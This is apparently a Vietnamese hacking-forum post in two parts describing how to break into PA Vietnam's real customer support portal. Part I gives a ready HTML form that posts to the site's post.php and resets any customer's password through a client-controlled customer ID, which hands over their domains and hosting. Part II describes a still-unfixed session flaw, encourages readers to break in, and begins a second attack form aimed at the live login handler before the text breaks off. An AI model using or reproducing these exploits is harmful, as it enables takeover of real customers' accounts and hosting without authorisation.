<td class="td_1"> </td> <td class="td_1"> <input name="upid" value='****' type="hidden"> <input name="pro" type="submit" class="submitbutton" value=" Thay đổi "> <input name="Submit2" type="reset" class="submitbutton" value=" Làm lại "></td> </tr> </table><p style="margin-bottom: -19"></FORM> <table width="100%" height="10" border="0" cellpadding="0" cellspacing="0"> <tr> <td><img src="images/spaces.gif" width="1" height="1"></td> </tr> </table></td> Khà khà ,có điều thú vị nữa đây !!! Bạn tinh mắt một tý thì thấy nó có thẻ <input name="upid" value='****' type="hidden"> và Code: <form action="post.php" method="post"> -> đây chính là mã khách hàng mà ta đăng nhập đây -> vậy ta có một dự đón nếu file "post.php" kiểm tra mã khách hàng muốn thây đổi thông tin bằng cái <input name="upid" value='****' type="hidden"> thì ta có thể lợi dụng được nó !!! :-P (bây giờ thỉ phải thử mới biết được) Tạo môt file pass.html có nội dung như sau : Code: <form action="http://support.pavietnam.net/post.php" method="post"> <table border="0" align="center"> <tr> <td>Ma khach hang : </td> <td> <input name="upid" > </td> </tr> <tr> <td>Mat Khau : </td> <td><input name="pass" size="20"></td> </tr> <tr> <td>Email</td> <td><span class="td_2"> <INPUT name='email' class=box_input size="20"> </span> </td> </tr> <tr> <td> </td> <td><input name="pro" type="submit" class="submitbutton" value="Thay doi"></td> </tr> </table> </form> Ta nhập vào một mã khách hàng bất kì ví dụ "1001" va pass "123456" Nhấn Submit Sau đó vào lại trang login của nó nhập mã khách hàng và pass -> ;;-) he he he không ngoài dự tính , file post.php kiễm tra mã khách hàng từ phía clien nên thông tin mã khách hàng trên đã bị thay đổi và ta có thể vào và tất nhiên là nắm quyền quản lý domain va host cua khách hàng !!!! (file post.php cho phép ta truy xuất tới nó mặt dù ta không phải là thành viên) Phần kết: - Mức độ lỗi rất nguy hiểm ! -Đã thông báo với PA VIETNAM và họ đã fix !!! Chào các bạn ! Như các bạn đã biết lần trước PA VIETNAM đã mắc phải một lỗi hết sức nghiêm trọng về hệ thống support của họ , đó là lỗi kiễm tra mã khách hàng từ phía client . Xem qua bài viết Hack PA VIETNAM phần I : http://hcegroup.net/Forums/index.php?showtopic=1884 Chú ý : Vì mức độ cực kỳ nguy hiểm mà bug thì chưa được PA VIETNAM fix (đã cố gắng thông báo với PA nhưng không ai trả lời hết ) nên mình nói trước với các bạn là sau khi các bạn đọc những gì mình viết dưới đây các bạn cứ đột nhập vào nhưng nhưng chỉ để tham khảo thôi, đừng có phá phách người ta tội nghiệp. Mình không chịu bất cứ trách nhiệm nào về việc làm của bạn khi áp dụng những gì mình viết dưới đây. -> Có lẻ là hơi nhàm nhưng phải viết Phần I cũng tương đối là thú vị phải không các bạn ! Nếu các bạn có nhã hứng chúng ta hãy cùng xem qua phần II -> niềm vui sẽ tăng gấp đôi ! -> he he he !!! Vào vấng đề thôi : Chiều nay trời mưa to quá ! nguoihung chẳng biết làm gì ngoài việc ngồi vào chiếc PC của mình như mọi khi ! PC vừa khởi động xong , nguoihung liền bật ngay cái Internet Explorer lên , và lướt web . Dạo qua trang www.vnn.vn xem một vài tin tức chơi -> -> hvanews.net -> và cuối cùng là vào hvaonline.net , sau khi xem một vài bài viết mới , đột nhiên nguoihung thấy cái topic Hack PAVIETNAM mà mình đã post cách đây vài hôm . Tự nhiên lại thấy ngứa ngáy với cái SUPPORT của PA quá -> ( máu hack hiết nỗi lên rồi ! ) -> http://support.pavietnam.net -> Enter -> Một cái bảng đăng nhập quen thuộc lại hiện ra Nhập user và pass và login vào -> hi hi ! -> cái mã khách hang của minh lại hiên ra to tứơng -> nhớ lại hôm trước đã báo lỗi cho PA và họ đã fix -> hu hu hu -> vậy thì còn lỗi đâu mà hack với hiết nữa -> đành bó tay vậy -> thôi thì ta dọc nó chơi cho đỡ chán cũng được ! Dọc xong để đó một hồi lâu -> mở cửa sổ IE khác duyệt web xem tin tức tiếp -> chặp sau quay qua cửa sổ support cua PA ! -> oái nó bắt mình đăng nhập lại kìa ! Cháng quá ! ừ thôi thì đăng nhập lại -> nhưng lại bực mình quá ! -> moi cái thằng login này ra xem cái đã ( login.php ) ! -> ngay tại cửa sổ IE đã đăng nhập vào hể thống support nguoihung gõ : " http://support.pavietnam.net/login.php " -> enter một phát coi -> oái oái , sao lại thế này -> nó không hiên ra cái bảng đăng nhập nữa mà lại chạy thẳng vào " trang chủ " của SUPPORT luôn ! Bực thật ! -> đành mở cửa sổ IE khác thử xem ! -> hi hi hi bây giờ thì cái bảng đăng nhập nó mới chiệu hiên ra ! -> nhưng bây giờ làm gì nữa đây -> không biêt làm gì hêt ngoài chuyện ngồi suy luận -> -> suy nghĩ một tý ! Quay lại các bước mình đã đi qua và giải thích thử xem có gì đáng chú ý không -> Đầu tiên thì ta đăng nhập vào hệ thông ( không có gì đáng chú ý cả ) -> tiếp theo để một hồi lâu thì nó bắt mình đăng nhập lại ( session đã hết thời gian và không có sử dụng cookie ) -> tiếp theo ta nhập lại và chay link tới file " login.php " ngay trên cửa sổ IE đã đăng nhập thì nó lại chạy thẳng vào trang chủ ( chổ này hình như có vấn đề ! ) -> nhưng mà vấn đề gì vậy ? -> không biết nữa để suy luận cái đả Thứ nhất : sở dĩ chúng ta bị quay lai trang chủ luôn là do một biến session nào đó được tạo khi ta đã login và file login.php phải có một đoạn là " nếu nhận được giá trị này thì quay về trang chủ " -> nhưng như vậy thì chẳng có gì hết ! he he he ! đừng xem thường chổ này ! -> cái đáng chú ý là cái biến session này phải có dạng tổng quát , tức là nó phải làm sao khi không chỉ riêng một tài khoản mà tất cả các tài khoản khác khi làm như nguoihung thì cũng phải bị quay về trang chủ . Vậy thì mình sẽ hình dung cái biến session đó có dạng đại khái như : Code: session_register("login"); $login="true"; -> vậy thì ở đây mình được gì ? -> có chứ ! mình được cấp session như bao khách hàng hàng (đặt biệt là ADMIN ) Tới đây chúng ta đã đi được hình như là nữa chặng đường rồi đó -> hãy suy luận thêm một tý nữa đi ! Nhớ lại lúc ta login -> thấy xuất hiện cái mã khách hàng to tướng ở trang chủ -> khà khà -> vậy thì cần phải có thêm một biến session nữa đây -> có lẽ nó sẽ như vầy : CODE session_register("makhachhang"); $makhachhang="mã khách hàng ta nhập vào lúc đăng nhập"; -> Ha ha ha -> cuối cùng thì vấn đề là chổ này đây -> bây giờ ta có một dự đoán -> nếu thằng " login.php " này kiễm tra quá đăng nhập yếu kém thì ta có thể tậng dụng được sơ hở này để thay đổi cái session "ma khach hàng trên " Khà khà ! còn đợi gì nữa ! bây giờ ta phải thử thôi ! Tạo môt file login.html có nội dung như sau : Code: <form name="login_form" method="post" action="http://support.pavietnam.net/check.php?action=login">